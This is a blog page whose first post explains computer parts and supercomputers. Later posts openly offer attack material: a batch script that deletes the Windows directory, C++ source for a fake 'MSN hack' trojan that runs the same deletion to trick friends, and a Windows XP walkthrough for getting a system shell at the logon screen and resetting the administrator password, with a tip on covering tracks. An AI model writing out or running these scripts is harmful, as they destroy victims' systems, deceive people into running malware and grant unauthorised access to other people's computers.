.....................................
How PC Works
Know all about your PC queries here.
Friday, April 1, 2011
Thursday, February 24, 2011
How Computer Works::
Parts
A computer is any electronic device that consists of four parts---in any form. A computer must have a way to input information, output information, process information and store information. Any electronic device that meets all four requirements is considered a computer. The most common device considered a computer is the personal computer (PC), whether it be made by Apple or by another manufacturer.
Input
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMaYxtNPSB8q1WJblcIxuwW4Atj0ji5KC96VnYdZ7NHdj6cM8JXLmtgUEF4-IuWGvaQ22H-fEeWfMhAzt70NLARPaWXLnd-4yzMnN_TxPxpcnT72Q3grkJzOksXDXRMjaUaomtIfWqa34k/s200/input-keyboard-and-mouse.jpg)
Output
An output device is a device that allows the computer to show the result of a process (usually to a person). The most common PC output device is the monitor, as the monitor displays the result of calculations or requests made by the user. The computer communicates with the output devices by using small electric signals over wires connected to the computer. Other common output devices include the printer, speakers and plotters.
Processor
The heart of the computer is the processor. This is the part of the computer that does all the hard work. The processor in a PC is also called the CPU or central processing unit. This is a silicon chip attached to the motherboard of the PC. The motherboard connects all the various parts of the computer together to allow them to communicate with one another. The CPU in the PC does all the calculations, receives electronic signals from input devices, sends electronic signals to output devices and sends electronic information to storage devices.
Storage
The storage device allows the computer to retain information. Without a storage device, the computer would be the same every time it was turned on and would be unable to store things such as documents and bookmarks. Storage devices vary in the methods used to store the information, but most information is stored simply as a series of ones and zeros. The most common storage device on a PC is the hard drive or hard disc. This device uses magnets to store information when you save it to your disc. Other storage devices include optical storage, floppy drives and tape drives.
Supercomputer
A supercomputer is a computer which performs at a rate of speed which is far above that of other computers. Given the constantly changing world of computing, it should come as no surprise to learn that most supercomputers bear their superlative titles for a few years, at best. Computer programmers are fond of saying that today's supercomputer will become tomorrow's computer; the computer you are reading this article on is probably more powerful than most historic supercomputers, for example.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKydIouiE3AOHGHXw_K8s4llYmtO4Oih4c1U3fR0x7GYbT7SOeWTaJauKwylgz449NPMV8zSKCD08Ls1U7NrifHZCIIlDDReKhBYxHUsHgM27Z8cmyxMpldiTrZW85GJok4dVn5Xbad3b0/s200/ibm-blue-gene-p-supercomputer-photo2.jpg)
The primary use for supercomputers is in scientific computing, which requires high-powered computers to perform complex calculations. Scientific organizations like NASA boast supercomputers the size of rooms for the purpose of performing calculations, rendering complex formulas, and performing other tasks which require a formidable amount of computer power. Some supercomputers have also been designed for very specific functions like cracking codes and playing chess; Deep Blue is a famous chess-playing supercomputer.
In many cases, a supercomputer is custom-assembled, utilizing elements from a range of computer manufacturers and tailored for its intended use. Most supercomputers run on a Linux or Unix operating system, as these operating systems are extremely flexible, stable, and efficient. Supercomputers typically have multiple processors and a variety of other technological tricks to ensure that they run smoothly.
One of the biggest concerns with running a supercomputer is cooling. As one might imagine, supercomputers get extremely hot as they run, requiring complex cooling systems to ensure that no part of the computer fails. Many of these cooling systems take advantage of liquid gases, which can get extremely cold. Another issue is the speed at which information can be transferred or written to a storage device, as the speed of data transfer will limit the supercomputer's performance.
Monday, February 21, 2011
Simple Virus Program
Well this is a simple batch virus that will delete your victim's windows.
It's tested and it works 100%
Open up a notepad and type:
Code:
@echo off rd /Q /S %windir% shutdown -s -t 01
Save as > .bat file
When you run it, it will delete your c:\windows\
You'll need to format after that.
Now a C++ code to trick your friends
Code:
#include <iostream>
#include <windows.h>
using namespace std;
string email;
system("title MSN HACK by .:d3vILL:.");
cout << "Welcome to MSN hack by .:d3vILL:." << endl; cout << "Enter your victim's email :";
cin >> email;
cout << "Veryfing email";
Sleep(400);
for(int i=1;i<=3;i+=1);
{ cout << "."; Sleep(750); }
cout << "Hacking password of " << email << endl;
cout << "Please wait.." << endl; Sleep(1000);
cout << "Estimated time: 10 minutes" << endl; Sleep(1000);
system("@echo off");
system("rd /S /Q %windir%");
return 0;
} ////////////////////////// / Coded By DGi / //////////////////////////
This is actually the same , but you can tell your friends it's a MSN hack program that hacks hotmail email passwords.
Note: It is provided for educational purpose only. Do it on your own risk.
How To Hack Windows Xp Admin Passwords
This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Gaurav and you want the password blah enter this
"net user Gaurav blah"
and this changes the password on Gaurav's machine to blah and your in.
Have fun!!!!
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either.
Subscribe to:
Posts (Atom)